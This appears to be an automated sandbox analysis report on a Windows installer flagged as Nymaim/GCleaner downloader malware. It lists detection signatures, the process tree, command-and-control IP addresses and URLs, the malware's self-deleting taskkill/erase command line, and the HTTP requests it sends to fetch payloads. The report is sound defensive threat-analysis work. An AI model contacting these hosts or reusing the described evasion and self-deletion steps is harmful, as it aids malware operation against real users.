
Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 764043
MD5: 71f3a21ccd6e54f8178d3fb65f4849b9
SHA1: b24f88c179a8e0777bffbcc4c9f969fb4d32d148
SHA256: 7dbb8aa3f00f0f0d24acf0b1bdb73d05f422e90fd46c2a6fed0b44fe9a0a721a
Tags: exe

Detection

Nymaim
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Nymaim
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to detect sandboxes (foreground window change detection)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 3748 cmdline: C:\Users\user\Desktop\file.exe MD5: 71F3A21CCD6E54F8178D3FB65F4849B9)
    • is-I19BM.tmp (PID: 5936 cmdline: "C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp" /SL4 $30366 "C:\Users\user\Desktop\file.exe" 2214542 96256 MD5: 2C3832FDF847813369EC960CD39C8265)
      • ntFolders.exe (PID: 4824 cmdline: "C:\Program Files (x86)\PrintFolders\ntFolders.exe" MD5: D9A39F6C4EEDC8F1B89E30D35012D6B4)
        • karcA17.exe (PID: 412 cmdline: MD5: 3FB36CB0B7172E5298D2992D42984D06)
        • cmd.exe (PID: 5776 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • taskkill.exe (PID: 5920 cmdline: taskkill /im "ntFolders.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
  • cleanup

Malware configuration extractor: Nymaim {"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}

Yara matches in memory dumps:
Source: 00000002.00000002.393868626.0000000001740000.00000004.00001000.00020000.00000000.sdmp Rule: JoeSecurity_Nymaim Description: Yara detected Nymaim Author: Joe Security
Source: 00000002.00000002.393249857.0000000000400000.00000040.00000001.01000000.00000007.sdmp Rule: JoeSecurity_Nymaim Description: Yara detected Nymaim Author: Joe Security
Source: 00000002.00000002.394218193.0000000003160000.00000004.00001000.00020000.00000000.sdmp Rule: JoeSecurity_Nymaim Description: Yara detected Nymaim Author: Joe Security

Yara matches in unpacked PE files:
Source: 2.2.ntFolders.exe.400000.0.unpack Rule: JoeSecurity_Nymaim Description: Yara detected Nymaim Author: Joe Security
Source: 2.2.ntFolders.exe.3160000.4.raw.unpack Rule: JoeSecurity_Nymaim Description: Yara detected Nymaim Author: Joe Security
Source: 2.2.ntFolders.exe.3160000.4.unpack Rule: JoeSecurity_Nymaim Description: Yara detected Nymaim Author: Joe Security
Source: 2.2.ntFolders.exe.400000.0.raw.unpack Rule: JoeSecurity_Nymaim Description: Yara detected Nymaim Author: Joe Security

No Sigma rule has matched

Snort IDS alerts:
Timestamp: 12/09/22-11:02:15.223774
Source IP: 192.168.2.4
Destination IP: 45.139.105.171
SID: 2041920
Source Port: 49691
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 12/09/22-11:02:15.529889
Source IP: 107.182.129.235
Destination IP: 192.168.2.4
SID: 2852925
Source Port: 80
Destination Port: 49692
Protocol: TCP
Classtype: A Network Trojan was detected

                AV Detection

Source: http://171.22.30.106/library.php URL Reputation: Label: malware
Source: http://171.22.30.106/library.phpH Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exe ReversingLabs: Detection: 50%
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Joe Sandbox ML: detected
Source: 0.0.file.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.3.file.exe.2118000.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.file.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 2.2.ntFolders.exe.10000000.6.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 2.2.ntFolders.exe.3160000.4.raw.unpack Malware Configuration Extractor: Nymaim {"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_10001000 ISCryptGetVersion,
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_10001130 ArcFourCrypt,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,

                Compliance

Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Unpacked PE file: 2.2.ntFolders.exe.400000.0.unpack
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: Binary string: E:\DATA\Codework\PrintFolders\source\Release\Russian.pdb source: is-RBTTG.tmp.1.dr
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_00451554 FindFirstFileA,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_0048A778 FindFirstFileA,6D7069D0,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00423E2D FindFirstFileExW,
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_1000959D FindFirstFileExW,
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\

                Networking

Source: Traffic Snort IDS: 2041920 ET TROJAN GCleaner Downloader Activity M8 192.168.2.4:49691 -> 45.139.105.171:80
Source: Traffic Snort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 107.182.129.235:80 -> 192.168.2.4:49692
Source: Malware configuration extractor IPs: 45.139.105.1
Source: Malware configuration extractor IPs: 85.31.46.167
Source: Malware configuration extractor IPs: 107.182.129.235
Source: Malware configuration extractor IPs: 171.22.30.106
Source: Joe Sandbox View ASN Name: CMCSUS CMCSUS
Source: Joe Sandbox View IP Address: 45.139.105.171 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.php
                Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/ping.php
                Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.php
                Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.phpH
                Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmp, ntFolders.exe, 00000002.00000002.394139951.000000000187A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                Source: file.exeString found in binary or memory: http://www.innosetup.com
                Source: is-I19BM.tmp, is-I19BM.tmp, 00000001.00000000.306831625.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp, is-I19BM.tmp, 00000001.00000002.395161258.00000000004BC000.00000002.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.drString found in binary or memory: http://www.innosetup.comDVarFileInfo$
                Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp, is-I19BM.tmp, is-I19BM.tmp, 00000001.00000000.306831625.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.drString found in binary or memory: http://www.remobjects.com/?ps
                Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp, is-I19BM.tmp, 00000001.00000000.306831625.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.drString found in binary or memory: http://www.remobjects.com/?psU
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
Source: global traffic HTTP traffic detected:
  GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1
  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
  User-Agent: 1
  Host: 45.139.105.171
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /storage/ping.php HTTP/1.1
  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
  User-Agent: 0
  Host: 107.182.129.235
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /storage/extension.php HTTP/1.1
  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
  User-Agent: 1
  Host: 107.182.129.235
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /library.php HTTP/1.1
  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
  User-Agent: 2
  Host: 171.22.30.106
  Connection: Keep-Alive
  Cache-Control: no-cache

                E-Banking Fraud

Source: Yara match File source: 2.2.ntFolders.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.ntFolders.exe.3160000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.ntFolders.exe.3160000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.ntFolders.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.393868626.0000000001740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.393249857.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.394218193.0000000003160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004081C8
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_00468940
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_00460F30
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_0043DF70
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_004303A4
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_0047A6D8
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_004446E8
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_00434994
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_0045AA90
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_00480BDC
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_00444C90
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_00462F38
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_00445388
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_00435698
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_00445794
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_0042F948
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_00457BB4
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00404490
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_004096F0
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_004056A0
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00406800
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00406AA0
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00404D40
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00405F40
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00402F20
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_004150D3
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00415305
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_004223A9
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00419510
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00404840
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00426850
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00410A50
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_0042AB9A
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00421C88
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_0042ACBA
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00447D2D
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00428D39
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_00404F20
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_1000F670
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: 2_2_1000EC61
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: String function: 004035DC appears 90 times
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: String function: 00403548 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: String function: 00407B08 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: String function: 00445FF4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: String function: 00455A04 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: String function: 004037CC appears 193 times
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: String function: 00405AA4 appears 92 times
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: String function: 00455814 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: String function: 004462C4 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: String function: 004348AC appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: String function: 00451AFC appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: String function: 00408DF0 appears 42 times
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: String function: 10003C50 appears 34 times
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe Code function: String function: 0040F9E0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_00423D9C NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_004127F0 NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp Code function: 1_2_004551C4 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,
Source: is-I19BM.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-I19BM.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-I19BM.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-K96P8.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-K96P8.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-K96P8.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-RBTTG.tmp.1.dr Static PE information: No import functions for PE file found
Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename6 vs file.exe
Source: file.exe, 00000000.00000000.305692501.0000000000410000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename" vs file.exe
Source: file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
                Source: file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename6 vs file.exe
                Source: file.exeBinary or memory string: OriginalFilename" vs file.exe
                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\PrintFolders\Russian.dll (copy) A960C9DCD1D5C7B79F4FDD38D6F25299F4F7925555E381EA4AB6217681482F62
                Source: ntFolders.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_PRELOAD, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp "C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp" /SL4 $30366 "C:\Users\user\Desktop\file.exe" 2214542 96256
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpProcess created: C:\Program Files (x86)\PrintFolders\ntFolders.exe "C:\Program Files (x86)\PrintFolders\ntFolders.exe"
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeProcess created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exe
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "ntFolders.exe" /f
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00408F74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6DB74E70,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00453A8C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6DB74E70,
                Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "ntFolders.exe")
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp
                Source: classification engine | Classification label: mal96.troj.evad.winEXE@12/23@0/5
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | File read: C:\Users\desktop.ini
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00454498 GetModuleHandleA,6D705550,GetDiskFreeSpaceA,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification,
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4212:120:WilError_01
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_0040B1E0 FindResourceA,FreeResource,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | File created: C:\Program Files (x86)\PrintFolders
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Command line argument: `a}{
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Command line argument: MFE.
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Command line argument: ZK]Z
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Command line argument: ZK]Z
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Window found: window name: TMainForm
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: file.exe | Static file information: File size 2460138 > 1048576
                Source: Binary string: E:\DATA\Codework\PrintFolders\source\Release\Russian.pdb source: is-RBTTG.tmp.1.dr

                Data Obfuscation

                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Unpacked PE file: 2.2.ntFolders.exe.400000.0.unpack
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Unpacked PE file: 2.2.ntFolders.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.aud104:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406584 push 004065C1h; ret
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404159 push eax; ret
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404229 push 00404435h; ret
